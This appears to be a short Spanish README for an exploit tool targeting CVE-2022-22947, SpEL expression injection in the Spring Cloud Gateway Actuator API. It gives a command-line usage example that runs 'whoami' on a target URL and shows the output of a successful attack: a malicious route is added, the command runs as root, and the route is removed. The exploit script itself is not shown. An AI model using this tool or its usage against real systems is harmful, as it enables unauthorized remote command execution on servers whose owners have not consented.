
Spring Cloud Gateway Actuator API Exp de inyección de expresión SpEL para ejecución de comandos
Spring Cloud Gateway Actuator API Exp de inyección de expresión SpEL y ejecución de comandos
Uso:python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" Resultado: ¡Ruta de expresión SpEL maliciosa añadida con éxito! ¡Ruta actualizada con éxito! Resultado de ataque obtenido con éxito:
================================================ root
================================================ ¡Ruta maliciosa eliminada! ¡Ruta actualizada con éxito!